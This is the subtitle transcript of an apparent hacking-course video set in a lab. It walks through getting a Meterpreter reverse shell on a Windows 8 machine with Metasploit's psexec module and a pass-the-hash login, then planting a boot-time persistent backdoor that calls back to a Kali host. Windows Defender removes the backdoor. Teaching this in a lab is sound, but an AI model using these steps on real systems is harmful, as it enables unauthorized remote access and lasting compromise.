1
00:00:00,390 --> 00:00:04,710
So let's try to use the Meterpreter's persistence method on a Windows 8 victim.

2
00:00:15,510 --> 00:00:20,070
As you know, we need to have a Meterpreter session on the victim first.

3
00:00:20,580 --> 00:00:24,810
So I'm going to use the PsExec module to get the session on my Windows 8.

4
00:00:26,390 --> 00:00:27,800
search psexec.

5
00:00:28,970 --> 00:00:38,810
use exploit/windows/smb/psexec, set payload windows/meterpreter/reverse_tcp.

6
00:00:39,590 --> 00:00:47,120
Now show the options, and now the options: RHOST as Windows 8, LHOST as Kali.

7
00:00:48,920 --> 00:00:54,740
Username of my Windows 8 was admin and the password hash was on the desktop.

8
00:00:57,060 --> 00:01:03,870
Here, so I'll copy it and paste it as the SMBPass.

9
00:01:04,800 --> 00:01:09,030
Now leave the ports by default values and run the exploit.

10
00:01:12,850 --> 00:01:13,250
There.

11
00:01:13,870 --> 00:01:17,740
Now we have a Meterpreter session on the Windows 8 system.

12
00:01:19,030 --> 00:01:22,930
So run sysinfo to check the system and the connection.

13
00:01:23,940 --> 00:01:25,320
And here are the results.

14
00:01:28,140 --> 00:01:32,790
So now let's run the persistence method with -h first to see the parameters.

15
00:01:33,850 --> 00:01:36,100
And now we're ready to prepare the command.

16
00:01:37,630 --> 00:01:39,910
-A to start the handler automatically.

17
00:01:40,900 --> 00:01:49,870
Now, I don't set the payload this time because the default payload is exactly what I want. -X to autostart

18
00:01:49,870 --> 00:01:50,980
when the system boots.

19
00:01:52,490 --> 00:01:55,130
And 10 seconds between each try.

20
00:01:56,120 --> 00:01:57,350
-p for the port, no.

21
00:01:57,620 --> 00:02:01,040
I'll use the port 6666 this time.

22
00:02:01,700 --> 00:02:10,190
And finally -r for the listen host, which is Kali for me. Hit Enter to run the method.

23
00:02:12,030 --> 00:02:12,750
And it's finished.

24
00:02:13,410 --> 00:02:15,570
So let's look at the messages to see what happened.

25
00:02:16,860 --> 00:02:21,870
It says the persistent script has been written to the temp folder under the Windows folder.

26
00:02:22,440 --> 00:02:25,650
So let's look at the victim machine and see if that's correct.

27
00:02:26,520 --> 00:02:29,760
We'll go to the temp folder in Windows Explorer.

28
00:02:31,040 --> 00:02:31,580
Oops!

29
00:02:32,600 --> 00:02:39,530
Windows Defender detected the file, so to cross-check, I go to the temp folder to see whether the

30
00:02:39,530 --> 00:02:41,060
script file is in there or not.

31
00:02:43,570 --> 00:02:45,730
No, the script is not here.

32
00:02:46,360 --> 00:02:53,950
It's detected by Windows Defender and deleted, so we should find another way to open a persistent back

33
00:02:53,950 --> 00:02:54,310
door.

34
00:02:55,000 --> 00:02:56,350
There's always more than one way.